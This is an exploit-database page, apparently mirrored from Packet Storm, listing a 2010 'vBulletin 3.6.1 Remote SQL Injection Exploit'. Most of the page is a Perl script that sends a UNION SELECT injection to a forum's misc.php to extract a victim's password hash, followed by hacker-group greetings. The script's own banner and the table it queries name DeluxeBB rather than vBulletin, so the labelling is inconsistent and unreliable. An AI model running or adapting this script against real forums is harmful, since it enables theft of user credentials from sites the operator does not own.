Lucene search
K

vBulletin 3.6.1 SQL Injection

🗓️ 20 Oct 2010 00:00:00Reported by jos_ali_joeType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

vBulletin 3.6.1 SQL Injection by jos_ali_jo

Code
`=========================================================  
vBulletin 3.6.1 Remote SQL Injection Exploit  
=========================================================  
  
[+]Title : vBulletin 3.6.1 Remote SQL Injection Exploit  
[+]Author : jos_ali_joe  
[+]Contact : [email protected]  
[+]Home : http://josalijoe.wordpress.com/   
  
  
########################################################################   
  
#!/usr/bin/perl  
  
use IO::Socket;  
  
print q{  
######################################################  
# DeluxeBB Remote SQL Injection Exploit #  
# vbulletin Remote SQL Injection Exploit #  
######################################################  
};  
  
if (!$ARGV[2]) {  
  
print q{  
Usage: perl dbbxpl.pl host /directory/ victim_userid  
  
perl dbbxpl.pl www.nekisite.com /forum/ 1  
  
};  
  
}  
  
$server = $ARGV[0];  
$dir = $ARGV[1];  
$user = $ARGV[2];  
$myuser = $ARGV[3];  
$mypass = $ARGV[4];  
$myid = $ARGV[5];  
  
print "------------------------------------------------------------------------------------------------\r\n";  
print "[>] SERVER: $server\r\n";  
print "[>] DIR: $dir\r\n";  
print "[>] USERID: $user\r\n";  
print "------------------------------------------------------------------------------------------------\r\n\r\n";  
  
$server =~ s/(http:\/\/)//eg;  
  
$path = $dir;  
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ?,0,0+FROM%20deluxebb_users%20WHERE%20(uid='".$user ;  
  
print "[~] PREPARE TO CONNECT...\r\n";  
  
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";  
  
print "[+] CONNECTED\r\n";  
print "[~] SENDING QUERY...\r\n";  
print $socket "GET $path HTTP/1.1\r\n";  
print $socket "Host: $server\r\n";  
print $socket "Accept: */*\r\n";  
print $socket "Connection: close\r\n\r\n";  
print "[+] DONE!\r\n\r\n";  
  
print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";  
while ($answer = <$socket>)  
{  
  
if ($answer =~/(\w{32})/)  
{  
  
if ($1 ne 0) {  
print "Password Hash is: ".$1."\r\n";  
print "--------------------------------------------------------------------------------------\r\n";  
  
}  
exit();  
}  
  
}  
print "------------------------------------------------------------------------------------------------\r\n";   
  
########################################################################   
  
Thanx :  
  
./Me Family ATeN4 :  
  
./N4ck0 - Aury - TeRRenJr  
  
Greets For :  
  
./Devilzc0de crew – Kebumen Cyber – Explore Crew – Indonesian Hacker  
  
My Team : ./Indonesian Coder  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Oct 2010 00:00Current
0.2Low risk
Vulners AI Score0.2
21